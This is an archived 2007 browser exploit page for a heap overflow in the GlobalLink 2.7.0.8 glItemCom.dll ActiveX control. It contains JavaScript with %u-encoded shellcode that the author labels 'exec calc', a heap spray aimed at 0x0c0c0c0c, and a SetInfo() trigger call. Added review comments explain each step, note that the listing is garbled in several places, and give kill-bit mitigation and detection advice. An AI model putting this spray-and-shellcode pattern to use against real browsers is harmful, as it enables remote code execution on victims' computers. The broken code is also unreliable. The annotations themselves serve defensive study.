
GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit


http://www.gipsky.com/
<html>
<body>
<object id="gl" classid="clsid:1C9B434A-0898-498A-B802-B00FA0962214"></object>
<script>
// NOTE(review): this archived proof-of-concept lost characters in extraction
// (several expressions on the page are not valid JavaScript as printed). Read
// it as a reference for indicators and mitigation, not as a runnable sample.

// Writes a <meta http-equiv="refresh"> tag whose content is built from
// window.location.href, i.e. the page asks the browser to reload itself.
document.write("<meta http-equiv=\"refresh\" content=\"1, " window.location.href "\"></meta>");

// Address constant used further down to decide how many blocks get allocated.
// The same 0x0c byte pattern recurs in the filler string and in the tail of
// the string passed to SetInfo().
var heapSprayToAddress = 0x0c0c0c0c;
// Payload, decoded from %u escapes into a UTF-16 string. It opens with a run
// of 0x90 bytes (x86 NOP); the author's inline comment labels the remainder
// "exec calc". The bytes are encoded, so that label is the author's claim and
// is not verified here.
var shellcode = unescape(
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"
// exec calc
"%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%uf513"
"%ue2ce%u8369%ufceb%uf4e2%u2609%u69a6%ucef5%u2c69"
"%u45c9%u6c9e%ucf8d%ue20d%ud6ba%u3669%ucfd5%u2009"
"%ufa7e%u6869%uff1b%uf022%u4a59%u1d22%u0ff2%u6428"
"%u0cf4%u9d09%u9ace%u6dc6%u2b80%u3669%ucfd1%u0f09"
"%uc27e%ue2a9%ud2aa%u82e3%ud27e%u6869%u471e%u4dbe"
"%u0df1%ua9d3%u4591%u59a2%u0e70%u659a%u8e7e%ue2ee"
"%ud285%ue24f%uc69d%u6009%u4e7e%u6952%ucef5%u0169"
"%u91c9%u9fd3%u9895%u916b%u0e76%u3999%u3e9d%u6d68"
"%ua6aa%u977a%uc07f%u96b5%uad12%u0583%uce96%u69e2"
);

// Heap-spray sizing and allocation. Defender reading: a short unescape("%u0c0c...")
// filler expanded to a large string, joined with a payload and stored many
// times in an array, is the pattern that content inspection and browser
// heap-spray mitigations key on.

// Target size of each sprayed string: 0x100000 bytes (1 MiB).
var heapBlockSize = 0x100000;
// .length counts UTF-16 code units, so *2 gives the payload size in bytes.
var payLoadSize = shellcode.length * 2;
// Filler size: block size minus the payload and a 0x38 term (presumably
// per-allocation overhead; the listing does not say). The expression is
// garbled as printed.
var spraySlideSize = heapBlockSize - (payLoadSize 0x38);
// Four-byte filler unit, passed to getSpraySlide() together with the target size.
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
// Block count: (0x0c0c0c0c - 0x100000) / 0x100000, about 192, so the loop below
// would hold roughly 192 MiB of strings. A jump of that size in browser memory
// is itself a useful detection signal.
// heapBlocks, memory and i are assigned without var (implicit globals).
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();

// Stores one filler-plus-payload string per slot of `memory`.
for (i=0;i<heapBlocks;i )
{
memory[i] = spraySlide shellcode;
}

/**
 * Returns the filler string trimmed to the requested size.
 *
 * The loop condition compares the string's byte size (length * 2, two bytes
 * per UTF-16 code unit) with spraySlideSize; the result is then cut to
 * spraySlideSize / 2 characters with substring().
 *
 * NOTE(review): as printed, the loop body is a self-assignment, so the length
 * never changes and the loop would not terminate for a short input. The
 * archived text is garbled here.
 *
 * @param {string} spraySlide - seed filler string.
 * @param {number} spraySlideSize - wanted size in bytes.
 * @returns {string} the first spraySlideSize / 2 characters of the filler.
 */
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide = spraySlide;
}
// Byte size -> character count.
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

// Trigger stage. `gl` is the ActiveX object declared by the page's <object>
// element (classid clsid:1C9B434A-0898-498A-B802-B00FA0962214). The page title
// attributes a heap overflow to SetInfo() in glItemCom.dll; which parameter is
// mishandled is not stated on the page. The only non-trivial argument here is
// the last one, a run of "A" characters followed by four 0x0c bytes.
//
// Mitigation: where no vendor fix is installed, the control can be blocked in
// Internet Explorer by setting the kill bit for the CLSID above
// (Compatibility Flags = 0x400 under
// HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}).
// Detection: web content that instantiates this CLSID and calls SetInfo().
var s = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "\x0c\x0c\x0c\x0c";
gl.SetInfo("", "", "", 1, 1, 1, "", s);
</script>
</body>
</html>

[2007-09-05]